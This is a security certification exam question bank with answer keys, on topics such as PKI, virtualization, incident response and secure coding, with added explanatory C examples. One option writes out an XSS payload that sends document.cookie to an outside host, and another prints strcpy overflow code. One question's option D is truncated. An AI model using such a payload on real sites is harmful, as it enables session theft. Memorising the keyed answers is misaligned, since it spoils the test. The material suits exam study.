A corporate executive lost their smartphone while on an overseas business trip. The phone was equipped with file encryption and secured with a strong passphrase. The phone contained over 60GB of proprietary data. Given this scenario, which of the following is the BEST course of action? A. File an insurance claim and assure the executive the data is secure because it is encrypted. B. Immediately implement a plan to remotely wipe all data from the device. C. Have the executive change all passwords and issue the executive a new phone. D. Execute a plan to remotely disable the device and report the loss to the police.
B. Immediately implement a plan to remotely wipe all data from the device.
A company has decided to use the SDLC for the creation and production of a new information system. The security administrator is training all users on how to protect company information while using the new system, along with being able to recognize social engineering attacks. Senior Management must also formally approve of the system prior to it going live. In which of the following phases would these security controls take place? A. Operations and Maintenance B. Implementation C. Acquisition and Development D. Initiation
B. Implementation
The IT department of a pharmaceutical research company is considering whether the company should allow or block access to social media websites during lunch time. The company is considering the possibility of allowing access only through the company's guest wireless network, which is logically separated from the internal research network. The company prohibits the use of personal devices; therefore, such access will take place from company owned laptops. Which of the following is the HIGHEST risk to the organization? A. Employee's professional reputation B. Intellectual property confidentiality loss C. Downloaded viruses on the company laptops D. Workstation compromise affecting availability
B. Intellectual property confidentiality loss
A company has decided to relocate and the security manager has been tasked to perform a site survey of the new location to help in the design of the physical infrastructure. The current location has video surveillance throughout the building and entryways. The following requirements must be met: (1) the ability to log entry of all employees in and out of specific areas; (2) access control into and out of all sensitive areas; (3) tailgating prevention. Which of the following would MOST likely be implemented to meet the above requirements and provide a secure solution? (Select TWO). A. Discretionary Access control B. Man trap C. Visitor logs D. Proximity readers E. Motion detection sensors
B. Man trap D. Proximity readers
A small company has a network with 37 workstations, 3 printers, a 48 port switch, an enterprise class router, and a firewall at the boundary to the ISP. The workstations have the latest patches and all have up-to-date anti-virus software. User authentication is a two-factor system with fingerprint scanners and passwords. Sensitive data on each workstation is encrypted. The network is configured to use IPv4 and is a standard Ethernet network. The network also has a captive portal based wireless hot-spot to accommodate visitors. Which of the following is a problem with the security posture of this company? A. No effective controls in place B. No transport security controls are implemented C. Insufficient user authentication controls are implemented D. IPv6 is not incorporated in the network
B. No transport security controls are implemented
A technician states that workstations that are on the network in location B are unable to validate certificates, while workstations that are on the main location A's network are having no issues. Which of the following methods allows a certificate to be validated by a single server that returns the validity of that certificate? A. XACML B. OCSP C. ACL D. CRL
B. OCSP
A number of security incidents have been reported involving mobile web-based code developed by a consulting company. Performing a root cause analysis, the security administrator of the consulting company discovers that the problem is a simple programming error that results in extra information being loaded into memory when the proper format is selected by the user. After repeating the process several times, the security administrator is able to execute unintended instructions through this method. Which of the following BEST describes the problem that is occurring, a good mitigation technique to use to prevent future occurrences, and why it is a security concern? A. Problem: Cross-site scripting Mitigation Technique: Input validation Security Concern: Decreases the company's profits; cross-site scripting can enable malicious actors to compromise the confidentiality of network connections or interrupt the availability of the network. B. Problem: Buffer overflow Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability; buffer overflows can enable malicious actors to compromise the confidentiality/availability of the data. C. Problem: SQL injection Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability; SQL injection can enable malicious actors to compromise the confidentiality of data or interrupt the availability of a system. D. Problem: Buffer overflow Mitigation Technique: Output validation Security Concern: Exposes the company to public scrutiny; buffer overflows can enable malicious actors to interrupt the availability of a system.
B. Problem: Buffer overflow Mitigation Technique: Secure coding standards Security Concern: Exposes the company to liability; buffer overflows can enable malicious actors to compromise the confidentiality/availability of the data.
A company has asked their network engineer to list the major advantages for implementing a virtual environment in regards to cost. Which of the following would MOST likely be selected? A. Ease of patch testing B. Reducing physical footprint C. Reduced network traffic D. Isolation of applications
B. Reducing physical footprint
Within a large organization, the corporate security policy states that personal electronic devices are not allowed to be placed on the company network. There is considerable pressure from the company board to allow smartphones to connect and synchronize email and calendar items of board members and company executives. Which of the following options BEST balances the security and usability requirements of the executive management team? A. Allow only the executive management team the ability to use personal devices on the company network, as they have important responsibilities and need convenient access. B. Review the security policy. Perform a risk evaluation of allowing devices that can be centrally managed, remotely disabled, and have device-level encryption of sensitive data. C. Stand firm on disallowing non-company assets from connecting to the network as the assets may lead to undesirable security consequences, such as sensitive emails being leaked outside the company. D. Allow only certain devices that are known to have the ability of being centrally managed. Do not allow any other smartphones until the device is proven to be centrally managed.
B. Review the security policy. Perform a risk evaluation of allowing devices that can be centrally managed, remotely disabled, and have device-level encryption of sensitive data.
Which of the following can aid a buffer overflow attack to execute when used in the creation of applications? A. Secure cookie storage B. Standard libraries C. State management D. Input validation
B. Standard libraries
After a security incident, an administrator revokes the SSL certificate for their web server www.company.com. Later, users begin to inform the help desk that a few other servers are generating certificate errors: ftp.company.com, mail.company.com, and partners.company.com. Which of the following is MOST likely the reason for this? A. Each of the servers used the same EV certificate. B. The servers used a wildcard certificate. C. The web server was the CA for the domain. D. Revoking a certificate can only be done at the domain level.
B. The servers used a wildcard certificate.
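Why revoking one certificate took four hostnames down, as an added example that is not part of the question bank: the name-matching rule a TLS client applies to a wildcard DNS name (RFC 6125 section 6.4.3), and a count of how many of the question's hosts a single `*.company.com` certificate covers. The hostnames are the question's; the function names and the extra `dev.lab.company.com` host are assumptions for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Case-insensitive comparison of two DNS names (DNS names are case-insensitive). */
static int names_equal(const char *a, const char *b) {
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b))
            return 0;
    return *a == '\0' && *b == '\0';
}

/* Returns 1 if `host` is covered by the certificate name `cert_name` (a DNS-ID
   from the subjectAltName), 0 otherwise.  Wildcard rule per RFC 6125 6.4.3:
   the wildcard must be the entire left-most label ("*.company.com"), it
   matches exactly one label, and it does not match the parent name itself. */
int cert_name_matches(const char *cert_name, const char *host) {
    if (strncmp(cert_name, "*.", 2) != 0)
        return names_equal(cert_name, host);      /* plain name: exact match only */

    const char *parent = cert_name + 2;           /* "company.com" */
    const char *dot = strchr(host, '.');
    if (dot == NULL || dot == host)               /* no label to consume, or an empty one */
        return 0;
    /* Everything after the first label must equal the parent.  This rejects
       "company.com" (remainder "com") and "dev.lab.company.com" (remainder
       "lab.company.com"): a wildcard spans one label, not several. */
    return names_equal(dot + 1, parent);
}

/* How many of the given hosts one certificate name covers, i.e. how many
   services fail together when that certificate is revoked. */
int hosts_covered(const char *cert_name, const char *const *hosts, int n) {
    int covered = 0;
    for (int i = 0; i < n; i++)
        if (cert_name_matches(cert_name, hosts[i]))
            covered++;
    return covered;
}

int main(void) {
    /* Constructed host list: the four from the question plus two that a
       wildcard must NOT cover. */
    const char *const hosts[] = {
        "www.company.com", "ftp.company.com", "mail.company.com",
        "partners.company.com", "company.com", "dev.lab.company.com"
    };
    int n = (int)(sizeof hosts / sizeof hosts[0]);
    printf("*.company.com covers %d of %d hosts\n",
           hosts_covered("*.company.com", hosts, n), n);
    printf("www.company.com covers %d of %d hosts\n",
           hosts_covered("www.company.com", hosts, n), n);
    return 0;
}
```

Two caveats a practitioner would add: a certificate that lists all four names explicitly in its subjectAltName fails the same way when revoked, so the check before revoking is "what names does this certificate carry", not just "is it a wildcard"; and option A is ruled out on its own terms, since the CA/Browser Forum EV Guidelines do not permit wildcard names in EV certificates.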
The security administrator has been tasked with providing a solution that would not only eliminate the need for physical desktops, but would also centralize the location of all desktop applications, without losing physical control of any network devices. Which of the following would the security manager MOST likely implement? A. VLANs B. VDI C. PaaS D. IaaS
B. VDI
Which of the following displays an example of a buffer overflow attack? A. <SCRIPT> document.location='http://site.comptia/cgi-bin/script.cgi?'+document.cookie </SCRIPT> B. Checksums-Sha1: 7be9e9bac3882beab1abb002bb5cd2302c76c48d 1157 xfig_3.2.5.b-1.dsc e0e3c9a9df6fac8f1536c2209025577edb1d1d9e 5770796 xfig_3.2.5.b.orig.tar.gz d474180fbeb6955e79bfc67520ad775a87b68d80 46856 xfig_3.2.5.b-1.diff.gz ddcba53dffd08e5d37492fbf99fe93392943c7b0 3363512 xfig-doc_3.2.5.b-1_all.deb 7773821c1a925978306d6c75ff5c579b018a2ac6 1677778 xfig-libs_3.2.5.b-1_all.deb b26c18cfb2ee2dc071b0e3bed6205c1fc0655022 739228 xfig_3.2.5.b-1_amd64.deb C. #include <string.h> char *code = "AAAABBBBCCCCDDD"; // including the character '\0' size = 16 bytes void main() { char buf[8]; strcpy(buf, code); } D. <form action="/cgi-bin/login" method=post> Username: <input type=text name=username> Password: <input type=password name=password> <input type=submit value=Login>
C. #include <string.h> char *code = "AAAABBBBCCCCDDD"; // including the character '\0' size = 16 bytes void main() { char buf[8]; strcpy(buf, code); }
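What the 16-byte `strcpy` into an 8-byte `buf` actually does, and what the "secure coding standards" mitigation from the earlier buffer-overflow question looks like in code, as an added example (not part of the question bank). It also illustrates the point of the question about standard libraries: `strcpy` copies until the NUL and never looks at the destination size. The stack frame is modelled as one 16-byte array whose second half stands in for the saved control data that follows `buf` on a real stack; that model, and the function names, are assumptions made so the overrun is deterministic and stays inside a single object.

```c
#include <stdio.h>
#include <string.h>

/* Model of the question's frame: an 8-byte buffer followed by the 8 bytes
   that sit after it (saved frame pointer / return address on a real stack).
   Both halves live in one 16-byte array so the overrun below is well-defined
   and behaves identically under every compiler. */
#define BUF_SIZE   8
#define FRAME_SIZE 16

/* Unbounded copy with exactly strcpy's contract: copies until the source
   NUL regardless of how much room the destination has. */
static void unchecked_copy(unsigned char *dst, const char *src) {
    size_t i = 0;
    do {
        dst[i] = (unsigned char)src[i];
    } while (src[i++] != '\0');
}

/* Bounded replacement: the NUL-terminated result must fit in buf_size bytes,
   otherwise the input is rejected and nothing is written.
   Returns 0 on success, -1 on rejection. */
static int checked_copy(unsigned char *dst, size_t buf_size, const char *src) {
    size_t len = strlen(src);
    if (len + 1 > buf_size)
        return -1;
    memcpy(dst, src, len + 1);
    return 0;
}

/* Runs the vulnerable copy on `payload` and reports whether any byte of the
   slot after the buffer was overwritten.  1 = control data clobbered,
   0 = stayed inside buf, -1 = payload too long even for the model frame. */
int overflow_clobbers_control(const char *payload) {
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    if (strlen(payload) + 1 > FRAME_SIZE)
        return -1;
    unchecked_copy(frame, payload);
    for (size_t i = BUF_SIZE; i < FRAME_SIZE; i++)
        if (frame[i] != 0)
            return 1;
    return 0;
}

/* Same payload through the bounded copy: 1 = accepted, 0 = rejected. */
int bounded_copy_accepts(const char *payload) {
    unsigned char frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    return checked_copy(frame, BUF_SIZE, payload) == 0;
}

int main(void) {
    const char *code = "AAAABBBBCCCCDDD";   /* 15 chars + NUL = 16 bytes, as in option C */
    printf("strcpy-style copy clobbers the control slot: %d\n",
           overflow_clobbers_control(code));
    printf("bounded copy accepts the same payload:      %d\n",
           bounded_copy_accepts(code));
    printf("bounded copy accepts \"AAAABBB\" (7 chars):    %d\n",
           bounded_copy_accepts("AAAABBB"));
    return 0;
}
```

The 15-character string lands its last seven characters ("CCCCDDD") in the slot after `buf`; on a real stack that is where an attacker's chosen return address goes. Compiler defences such as GCC's `-fstack-protector` and `_FORTIFY_SOURCE` would abort the real `strcpy` case at run time, but they are a backstop: the secure-coding fix is to never call an unbounded copy on attacker-influenced data, which is what `checked_copy` enforces by rejecting anything that does not fit with its terminator.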
A breach at a government agency resulted in the public release of top secret information. The Chief Information Security Officer has tasked a group of security professionals to deploy a system which will protect against such breaches in the future. Which of the following can the government agency deploy to meet future security needs? A. A DAC which enforces no read-up, a DAC which enforces no write-down, and a MAC which uses an access matrix. B. A MAC which enforces no write-up, a MAC which enforces no read-down, and a DAC which uses an ACL. C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix. D. A DAC which enforces no write-up, a DAC which enforces no read-down, and a MAC which
C. A MAC which enforces no read-up, a MAC which enforces no write-down, and a DAC which uses an access matrix.
A company provides on-demand virtual computing for a sensitive project. The company implements a fully virtualized datacenter and terminal server access with two-factor authentication for access to sensitive data. The security administrator at the company has uncovered a breach in data confidentiality. Sensitive data was found on a hidden directory within the hypervisor. Which of the following has MOST likely occurred? A. A stolen two factor token and a memory mapping RAM exploit were used to move data from one virtual guest to an unauthorized similar token. B. An employee with administrative access to the virtual guests was able to dump the guest memory onto their mapped disk. C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access. D. A virtual guest was left un-patched and an attacker was able to use a privilege escalation attack to gain unauthorized access.
C. A host server was left un-patched and an attacker was able to use a VMEscape attack to gain unauthorized access.
A new project initiative involves replacing a legacy core HR system, and is expected to touch many major operational systems in the company. A security administrator is engaged in the project to provide security consulting advice. In addition, there are database, network, application, HR, and transformation management consultants engaged on the project as well. The administrator has established the security requirements. Which of the following is the NEXT logical step? A. Document the security requirements in an email and move on to the next most urgent task. B. Organize for a requirements workshop with the non-technical project members, being the HR and transformation management consultants. C. Communicate the security requirements with all stakeholders for discussion and buy-in. D. Organize for a requirements workshop with the technical project members, being the database, network, and application consultants.
C. Communicate the security requirements with all stakeholders for discussion and buy-in.
An organization must comply with a new regulation that requires the organization to determine if an external attacker is able to gain access to its systems from outside the network. Which of the following should the company conduct to meet the regulation's criteria? A. Conduct a compliance review B. Conduct a vulnerability assessment C. Conduct a black box penetration test D. Conduct a full system audit
C. Conduct a black box penetration test
A company is developing a new web application for its Internet users and is following a secure coding methodology. Which of the following methods would BEST assist the developers in determining if any unknown vulnerabilities are present? A. Conduct web server load tests. B. Conduct static code analysis. C. Conduct fuzzing attacks. D. Conduct SQL injection and XSS attacks.
C. Conduct fuzzing attacks.
The security administrator at a bank is receiving numerous reports that customers are unable to login to the bank website. Upon further investigation, the security administrator discovers that the name associated with the bank website points to an unauthorized IP address. Which of the following solutions will MOST likely mitigate this type of attack? A. Security awareness and user training B. Recursive DNS from the root servers C. Configuring and deploying TSIG D. Firewalls and IDS technologies
C. Configuring and deploying TSIG
The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and wants to connect it to the company's internal network. The Chief Information Security Officer (CISO) was told to research and recommend how to secure this device. Which of the following recommendations should be implemented to keep the device from posing a security risk to the company? A. A corporate policy to prevent sensitive information from residing on a mobile device and antivirus software. B. Encryption of the non-volatile memory and a corporate policy to prevent sensitive information from residing on a mobile device. C. Encryption of the non-volatile memory and a password or PIN to access the device. D. A password or PIN to access the device and a corporate policy to prevent sensitive information from residing on a mobile device.
C. Encryption of the non-volatile memory and a password or PIN to access the device.
A manufacturing company is having issues with unauthorized access and modification of the controls operating the production equipment. A communication requirement is to allow the free flow of data between all network segments at the site. Which of the following BEST remediates the issue? A. Implement SCADA security measures. B. Implement NIPS to prevent the unauthorized activity. C. Implement an AAA solution. D. Implement a firewall to restrict access to only a single management station.
C. Implement an AAA solution.
A small bank is introducing online banking to its customers through its new secured website. The firewall has three interfaces: one for the Internet connection, another for the DMZ, and the other for the internal network. Which of the following will provide the MOST protection from all likely attacks on the bank? A. Implement NIPS inline between the web server and the firewall. B. Implement a web application firewall inline between the web server and the firewall. C. Implement host intrusion prevention on all machines at the bank. D. Configure the firewall policy to only allow communication with the web server using SSL.
C. Implement host intrusion prevention on all machines at the bank.
The Chief Executive Officer (CEO) of a corporation purchased the latest mobile device and connected it to the internal network. The CEO proceeded to download sensitive financial documents through their email. The device was then lost in transit to a conference. The CEO notified the company helpdesk about the lost device and another one was shipped out, after which the helpdesk ticket was closed stating the issue was resolved. This data breach was not properly reported due to insufficient training surrounding which of the following processes? A. E-Discovery B. Data handling C. Incident response D. Data recovery and storage
C. Incident response
An administrator wants to virtualize the company's web servers, application servers, and database servers. Which of the following should be done to secure the virtual host machines? (Select TWO). A. Establish VLANs for each virtual guest's NIC on the virtual switch. B. Enable virtual switch layer 2 security precautions. C. Only access hosts through a secure management interface. D. Distribute guests to hosts by application role or trust zone. E. Restrict physical and network access to the host console.
C. Only access hosts through a secure management interface. E. Restrict physical and network access to the host console.
A security audit has uncovered that some of the encryption keys used to secure the company B2B financial transactions with its partners may be too weak. The security administrator needs to implement a process to ensure that financial transactions will not be compromised if a weak encryption key is found. Which of the following should the security administrator implement? A. Entropy should be enabled on all SSLv2 transactions. B. AES256-CBC should be implemented for all encrypted data. C. PFS should be implemented on all VPN tunnels. D. PFS should be implemented on all SSH connections.
C. PFS should be implemented on all VPN tunnels.
The security administrator of a small private firm is researching and putting together a proposal to purchase an IPS to replace an existing IDS. A specific brand and model has been selected, but the security administrator needs to gather various cost information for that product. Which of the following documents would perform a cost analysis report and include information such as payment terms? A. RFI B. RTO C. RFQ D. RFC
C. RFQ
A security audit has uncovered a lack of security controls with respect to employees' network account management. Specifically, the audit reveals that employee's network accounts are not disabled in a timely manner once an employee departs the organization. The company policy states that the network account of an employee should be disabled within eight hours of termination. However, the audit shows that 5% of the accounts were not terminated until three days after a dismissed employee departs. Furthermore, 2% of the accounts are still active. Which of the following is the BEST course of action that the security officer can take to avoid repeat audit findings? A. Review the HR termination process and ask the software developers to review the identity management code. B. Enforce the company policy by conducting monthly account reviews of inactive accounts. C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations. D. Update the company policy to account for delays and unforeseen situations in account deactivation.
C. Review the termination policy with the company managers to ensure prompt reporting of employee terminations.
A user logs into domain A using a PKI certificate on a smartcard protected by an 8 digit PIN. The credential is cached by the authenticating server in domain A. Later, the user attempts to access a resource in domain B. This initiates a request to the original authenticating server to somehow attest to the resource server in the second domain that the user is in fact who they claim to be. Which of the following is being described? A. Authentication B. Authorization C. SAML D. Kerberos
C. SAML
A project has been established in a large bank to develop a new secure online banking platform. Half way through the development it was discovered that a key piece of software used as part of the base platform is now susceptible to recently published exploits. Who should be contacted FIRST by the project team to discuss potential changes to the platform requirements? A. Engineers B. Facilities Manager C. Stakeholders D. Human Resources
C. Stakeholders
Which of the following precautions should be taken to harden network devices in case of VMEscape? A. Database servers should be on the same virtual server as web servers in the DMZ network segment. B. Web servers should be on the same physical server as database servers in the network segment. C. Virtual servers should only be on the same physical server as others in their network segment. D. Physical servers should only be on the same WAN as other physical servers in their network.
C. Virtual servers should only be on the same physical server as others in their network segment.
The sales division within a large organization purchased touch screen tablet computers for all 250 sales representatives in an effort to showcase the use of technology to its customers and increase productivity. This includes the development of a new product tracking application that works with the new platform. The security manager attempted to stop the deployment because the equipment and application are non-standard and unsupported within the organization. However, upper management decided to continue the deployment. Which of the following provides the BEST method for evaluating the potential threats? A. Conduct a vulnerability assessment to determine the security posture of the new devices and the application. B. Benchmark other organizations that already encountered this type of situation and apply all relevant learnings and industry best practices. C. Work with the business to understand and classify the risk associated with the full lifecycle of the hardware and software deployment. D. Develop a standard image for the new devices and migrate to a web application to eliminate locally resident data.
C. Work with the business to understand and classify the risk associated with the full lifecycle of the hardware and software deployment.
The IT department of a large telecommunications company has developed and finalized a set of security solutions and policies which have been approved by upper management for deployment within the company. During the development of the security solutions and policies, the FIRST thing the IT department should have done was: A. contact vendor management so the RFI and RFP process can be started as soon as possible. B. contact an independent consultant who can tell them what policies and solutions they need. C. discuss requirements with stakeholders from the various internal departments. D. involve facilities management early in the project so they can plan for the new security hardware in the data center.
C. discuss requirements with stakeholders from the various internal departments.
An administrator is assessing the potential risk impact on an accounting system and categorizes it as follows: Administrative Files = {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Low)} Vendor Information = {(Confidentiality, Moderate), (Integrity, Low), (Availability, Low)} Payroll Data = {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)} Which of the following is the aggregate risk impact on the accounting system? A. {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Moderate)} B. {(Confidentiality, High), (Integrity, Low), (Availability, Low)} C. {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)} D. {(Confidentiality, Moderate), (Integrity, Moderate), (Availability, Low)}
C. {(Confidentiality, High), (Integrity, Moderate), (Availability, Low)}
Which of the following BEST defines the term e-discovery? A. A product that provides IT-specific governance, risk management, and compliance. B. A form of reconnaissance used by penetration testers to discover listening hosts. C. A synonymous term for computer emergency response and incident handling. D. A process of producing electronically stored information for use as evidence.
D. A process of producing electronically stored information for use as evidence.
Which of the following refers to programs running in an isolated space to run untested code and prevents the code from making permanent changes to the OS kernel and other data on the host machine? A. Input Validation B. Application hardening C. Code signing D. Application sandboxing
D. Application sandboxing
A system designer needs to factor in CIA requirements for a new SAN. Which of the CIA requirements is BEST met by multipathing? A. Confidentiality B. Authentication C. Integrity D. Availability
D. Availability
The security administrator is receiving numerous alerts from the internal IDS of a possible Conficker infection spreading through the network via the Windows file sharing services. Given the size of the company which deploys over 20,000 workstations and 1,000 servers, the security engineer believes that the best course of action is to block the file sharing service across the organization by placing ACLs on the internal routers. Which of the following should the security administrator do before applying the ACL? A. Quickly research best practices with respect to stopping Conficker infections and implement the solution. B. Consult with the rest of the security team and get approval on the solution by all the team members and the team manager. C. Apply the ACL immediately since this is an emergency that could lead to a widespread data compromise. D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.
D. Call an emergency change management meeting to ensure the ACL will not impact core business functions.
A company contracts with a third party to develop a new web application to process credit cards. Which of the following assessments will give the company the GREATEST level of assurance for the web application? A. Social Engineering B. Penetration Test C. Vulnerability Assessment D. Code Review
D. Code Review
A certain script was recently altered by the author to meet certain security requirements, and needs to be executed on several critical servers. Which of the following describes the process of ensuring that the script being used was not altered by anyone other than the author? A. Digital encryption B. Digital signing C. Password entropy D. Code signing
D. Code signing
Company XYZ provides residential television cable service across a large region. The company's board of directors is in the process of approving a deal with the following three companies: a national landline telephone provider, a regional wireless telephone provider, and an international Internet service provider. The board of directors at Company XYZ wants to keep the companies and billing separated. The Chief Information Officer (CIO) at Company XYZ is concerned about the confidentiality of Company XYZ's customer data and wants to share only minimal information about its customers for the purpose of accounting, billing, and customer authentication. The proposed solution must use open standards and must make it simple and seamless for Company XYZ's customers to receive all four services. Which of the following solutions is BEST suited for this scenario? A. All four companies must implement a TACACS+ web based single sign-on solution with associated captive portal technology. B. Company XYZ must implement VPN and strict access control to allow the other three companies to access the internal LDAP. C. Company XYZ needs to install the SP, while the partner companies need to install the WAYF portion of a Federated identity solution. D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution.
D. Company XYZ needs to install the IdP, while the partner companies need to install the SP portion of a Federated identity solution.
A user reports that the workstation's mouse pointer is moving and files are opening automatically. Which of the following should the user perform? A. Unplug the network cable to avoid network activity. B. Reboot the workstation to see if problem occurs again. C. Turn off the computer to avoid any more issues. D. Contact the incident response team for direction.
D. Contact the incident response team for direction.
Which of the following must be taken into consideration for e-discovery purposes when a legal case is first presented to a company? A. Data ownership on all files B. Data size on physical disks C. Data retention policies on only file servers D. Data recovery and storage
D. Data recovery and storage
Several critical servers are unresponsive after an update was installed. Other computers that have not yet received the same update are operational, but are vulnerable to certain buffer overflow attacks. The security administrator is required to ensure all systems have the latest updates while minimizing any downtime. Which of the following is the BEST risk mitigation strategy to use to ensure a system is properly updated and operational? A. Distributed patch management system where all systems in production are patched as updates are released. B. Central patch management system where all systems in production are patched by automatic updates as they are released. C. Central patch management system where all updates are tested in a lab environment after being installed on a live production system. D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.
D. Distributed patch management system where all updates are tested in a lab environment prior to being installed on a live production system.
Which of the following attacks does Unicast Reverse Path Forwarding prevent? A. Man in the Middle B. ARP poisoning C. Broadcast storm D. IP Spoofing
D. IP Spoofing
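How unicast Reverse Path Forwarding decides that a source address is spoofed, as an added example (not part of the question bank): a longest-prefix lookup over a small routing table, with the strict check (the source must be reachable back out of the ingress interface) beside the loose check (the source must merely be routable). The routing table, interface numbers and addresses are constructed for the example; the function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* A route: network prefix (host byte order), prefix length, egress interface. */
struct route {
    uint32_t prefix;
    int      plen;
    int      iface;
};

/* Constructed routing table.  Interface numbering is arbitrary:
   1 = internal LAN, 2 = a second internal segment, 3 = the ISP uplink. */
static const struct route rib[] = {
    { 0x0A000000u, 8,  1 },   /* 10.0.0.0/8          -> iface 1 */
    { 0xC0A80100u, 24, 2 },   /* 192.168.1.0/24      -> iface 2 */
    { 0x00000000u, 0,  3 },   /* 0.0.0.0/0 (default) -> iface 3 */
};
#define RIB_LEN (sizeof rib / sizeof rib[0])

/* Dotted-quad text to a host-order 32-bit address (0 on malformed input). */
uint32_t ip4(const char *s) {
    unsigned a, b, c, d;
    if (sscanf(s, "%u.%u.%u.%u", &a, &b, &c, &d) != 4 ||
        a > 255 || b > 255 || c > 255 || d > 255)
        return 0;
    return (a << 24) | (b << 16) | (c << 8) | d;
}

static uint32_t netmask(int plen) {
    return plen == 0 ? 0u : 0xFFFFFFFFu << (32 - plen);
}

/* Longest-prefix match: egress interface for `addr`, or -1 if unrouted.
   With `ignore_default` set, the 0/0 route does not count as a match. */
static int best_route_iface(uint32_t addr, int ignore_default) {
    int best_iface = -1, best_len = -1;
    for (size_t i = 0; i < RIB_LEN; i++) {
        if (ignore_default && rib[i].plen == 0)
            continue;
        if ((addr & netmask(rib[i].plen)) == rib[i].prefix && rib[i].plen > best_len) {
            best_len   = rib[i].plen;
            best_iface = rib[i].iface;
        }
    }
    return best_iface;
}

/* Strict uRPF: accept only if the router would send traffic back to the
   source address out of the very interface the packet arrived on. */
int urpf_strict_accept(uint32_t src, int ingress_iface) {
    int out = best_route_iface(src, 0);
    return out != -1 && out == ingress_iface;
}

/* Loose uRPF: accept if any route to the source exists.  With a default
   route in the table this admits every address unless the default route is
   excluded from the check, which `ignore_default` models. */
int urpf_loose_accept(uint32_t src, int ignore_default) {
    return best_route_iface(src, ignore_default) != -1;
}

int main(void) {
    printf("10.1.2.3 in on iface 1 (legitimate):       %d\n", urpf_strict_accept(ip4("10.1.2.3"), 1));
    printf("10.1.2.3 in on iface 3 (spoofed from ISP): %d\n", urpf_strict_accept(ip4("10.1.2.3"), 3));
    printf("8.8.8.8 in on iface 1 (spoofed egress):    %d\n", urpf_strict_accept(ip4("8.8.8.8"), 1));
    printf("loose, default route counts:               %d\n", urpf_loose_accept(ip4("203.0.113.9"), 0));
    printf("loose, default route ignored:              %d\n", urpf_loose_accept(ip4("203.0.113.9"), 1));
    return 0;
}
```

Strict mode catches both directions of the question's attack: an outside packet claiming an internal 10/8 source, and an internal host forging an external source for outbound flooding. The caveats are the ones that decide deployment in practice: strict mode drops legitimate traffic wherever routing is asymmetric (multihomed sites), which is why loose mode is used at such edges, and loose mode is worthless against spoofing if a default route is allowed to satisfy the check.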
A security consultant is evaluating forms which will be used on a company website. Which of the following techniques or terms is MOST effective at preventing malicious individuals from successfully exploiting programming flaws in the website? A. Anti-spam software B. Application sandboxing C. Data loss prevention D. Input validation
D. Input validation
A web administrator develops a web form for users to respond to the company via a web page. Which of the following should be practiced to avoid a security risk? A. SQL injection B. XSS scripting C. Click jacking D. Input validation
D. Input validation
Which of the following authentication types is used primarily to authenticate users through the use of tickets? A. LDAP B. RADIUS C. TACACS+ D. Kerberos
D. Kerberos
An administrator is reviewing a recent security audit and determines that two users in finance also have access to the human resource data. One of those users fills in for any HR employees on vacation, the other user only works in finance. Which of the following policies is being violated by the finance user according to the audit results? A. Mandatory vacation B. Non-disclosure C. Job rotation D. Least privilege
D. Least privilege
A security incident happens three times a year on a company's web server costing the company $1,500 in downtime, per occurrence. The web server is only for archival access and is scheduled to be decommissioned in five years. The cost of implementing software to prevent this incident would be $15,000 initially, plus $1,000 a year for maintenance. Which of the following is the MOST cost-effective manner to deal with this risk? A. Avoid the risk B. Transfer the risk C. Accept the risk D. Mitigate the risk
D. Mitigate the risk
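The arithmetic behind choosing mitigation, added here as a worked calculation rather than part of the original question. The figures are the question's; SLE, ARO and ALE are the standard single loss expectancy, annualized rate of occurrence and annualized loss expectancy.

$$\mathrm{SLE} = \$1{,}500, \qquad \mathrm{ARO} = 3\ \text{per year}, \qquad \mathrm{ALE} = \mathrm{SLE} \times \mathrm{ARO} = \$4{,}500\ \text{per year}$$

$$\text{Exposure over the remaining 5-year life} = 5 \times \$4{,}500 = \$22{,}500$$

$$\text{Cost of the control over 5 years} = \$15{,}000 + 5 \times \$1{,}000 = \$20{,}000$$

$$\text{Net benefit of mitigating} = \$22{,}500 - \$20{,}000 = \$2{,}500 > 0 \;\Rightarrow\; \text{mitigate}$$

The margin is thin, so it is worth knowing where it flips. Over $n$ remaining years the control pays for itself only when $15{,}000 + 1{,}000\,n < 4{,}500\,n$, i.e. $n > 30/7 \approx 4.3$ years. With three years left the exposure would be $\$13{,}500$ against a control cost of $\$18{,}000$, and accepting the risk would be the cheaper option. Transfer (insurance) and avoidance (decommissioning the archive early) carry no price in the question, so they cannot be compared on the same basis.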
A security administrator of a large private firm is researching and putting together a proposal to purchase an IPS. The specific IPS type has not been selected, and the security administrator needs to gather information from several vendors to determine a specific product. Which of the following documents would assist in choosing a specific brand and model? A. RFC B. RTO C. RFQ D. RFI
D. RFI
Which of the following is the MOST appropriate control measure for lost mobile devices? A. Disable unnecessary wireless interfaces such as Bluetooth. B. Reduce the amount of sensitive data stored on the device. C. Require authentication before access is given to the device. D. Require that the compromised devices be remotely wiped.
D. Require that the compromised devices be remotely wiped.
Which of the following is the MOST cost-effective solution for sanitizing a DVD with sensitive information on it? A. Write over the data B. Purge the data C. Incinerate the DVD D. Shred the DVD
D. Shred the DVD
A security administrator needs a secure computing solution to use for all of the company's security audit log storage, and to act as a central server to execute security functions from. Which of the following is the BEST option for the server in this scenario? A. A hardened Red Hat Enterprise Linux implementation running a software firewall B. Windows 7 with a secure domain policy and smartcard based authentication C. A hardened bastion host with a permit all policy implemented in a software firewall D. Solaris 10 with trusted extensions or SE Linux with a trusted policy
D. Solaris 10 with trusted extensions or SE Linux with a trusted policy
